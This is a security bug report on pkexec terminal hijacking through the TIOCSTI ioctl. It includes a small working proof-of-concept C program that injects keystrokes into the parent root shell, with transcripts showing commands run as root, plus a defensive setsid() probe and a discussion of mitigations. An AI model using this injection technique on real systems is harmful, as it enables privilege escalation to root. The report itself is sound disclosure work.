Bug 1299955

Summary: pkexec tty hijacking via TIOCSTI ioctl
Product: [Other] Security Response
Reporter: Federico Manuel Bento <up201407890>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
Severity: high
Priority: high
Version: unspecified
CC: carnil, davidlewis4, sam
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Doc Type: Bug Fix
Story Points: ---
Last Closed: 2021-10-19 09:04:31 UTC
Type: Bug
Regression: ---
Mount Type: ---
Documentation: ---
Category: ---
oVirt Team: ---
Cloudforms Team: ---
Bug Blocks: 1300746

Description Federico Manuel Bento 2016-01-19 15:37:52 UTC
When executing a program via "pkexec --user nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation.
This issue has been fixed in "su" CVE-2005-4890 by calling setsid() and in "sudo" by using the "use_pty" flag.

$ cat test.c
#include <sys/ioctl.h>

int main(void)
{
 /* Push "id\n" one byte at a time into the input queue of the
  * terminal on fd 0; the parent shell later reads it as typed input. */
 char *cmd = "id\n";
 while(*cmd)
  ioctl(0, TIOCSTI, cmd++);
 return 0;
}

$ gcc test.c -o test
$ id
uid=1000(saken) gid=1000(saken) groups=1000(saken)

# pkexec --user saken ./test ----> last command I type in
id
# id ----> did not type this
uid=0(root) gid=0(root) groups=0(root)
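To show why the setsid() approach named above (the su fix for CVE-2005-4890) stops this, the following added probe (not part of the bug report or of pkexec) forks a child, detaches it from the controlling terminal with setsid(), and only then attempts a single TIOCSTI push; the kernel refuses TIOCSTI on any tty that is not the caller's controlling tty unless the caller has CAP_SYS_ADMIN, so the unprivileged child gets EPERM. The function name and the single-newline probe character are this example's own choices.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Returns the errno the child got from ioctl(0, TIOCSTI, ...) after
 * setsid(): EPERM at a real terminal (fd 0 is still open but is no
 * longer the child's controlling tty), ENOTTY if fd 0 is not a tty,
 * 0 if the push went through (mitigation ineffective), -1 on failure.
 * Caveat: a child that keeps CAP_SYS_ADMIN (e.g. still root) passes the
 * kernel check anyway, so setsid() protects against the unprivileged
 * child only, which is exactly the pkexec --user case reported here.
 */
int tiocsti_errno_after_setsid(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* A fresh child is never a process-group leader, so setsid()
         * succeeds and drops the inherited controlling terminal. */
        if (setsid() < 0)
            _exit(255);
        char c = '\n';                 /* harmless probe character */
        if (ioctl(0, TIOCSTI, &c) == 0)
            _exit(0);
        _exit(errno & 0xff);           /* errno values are all < 255 */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    int code = WEXITSTATUS(status);
    return code == 255 ? -1 : code;
}

int main(void)
{
    int e = tiocsti_errno_after_setsid();
    if (e == 0)
        printf("TIOCSTI succeeded after setsid(): mitigation NOT effective\n");
    else if (e > 0)
        printf("TIOCSTI refused after setsid(): %s\n", strerror(e));
    else
        printf("probe could not run\n");
    return e == 0;
}
```

sudo's use_pty takes the other route mentioned in the report: the child gets a fresh pty as its controlling terminal, so any characters it pushes land in its own session rather than the parent's. On Linux 6.2 and later, the ioctl can also be disabled system-wide with the sysctl dev.tty.legacy_tiocsti=0, in which case the probe reports EIO.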

Comment 1 David Lewis 2016-02-26 16:36:10 UTC
You have to possess CAP_SYS_ADMIN to successfully invoke the TIOCSTI ioctl.  That implies to me that pkexec is allowing test to execute with that (and possibly other) capabilities.  If that's the case, you're merely running as root by another name.

Comment 2 David Lewis 2016-02-26 19:16:52 UTC
Or you can pass that tty ownership check that's been in there seemingly forever... sorry for the noise.

Comment 4 Sam Morris 2024-05-02 09:04:47 UTC
Has this actually been fixed? On a RHEL 8.9 system I've built the sample exploit from https://ruderich.org/simon/notes/su-sudo-from-root-tty-hijacking and it works:

  root@myhost:/var/tmp/tiocsti130# pkexec -u nobody /bin/bash
  bash-4.4$ /var/tmp/tiocsti/tiocsti  # <-- this is me running the exploit, subsequent output is caused by the exploit hijacking my terminal
  exit
  echo Payload as `whoami`
  bash-4.4$ exit
  exit
  root@myhost:/var/tmp/tiocsti# echo Payload as `whoami`
  Payload as root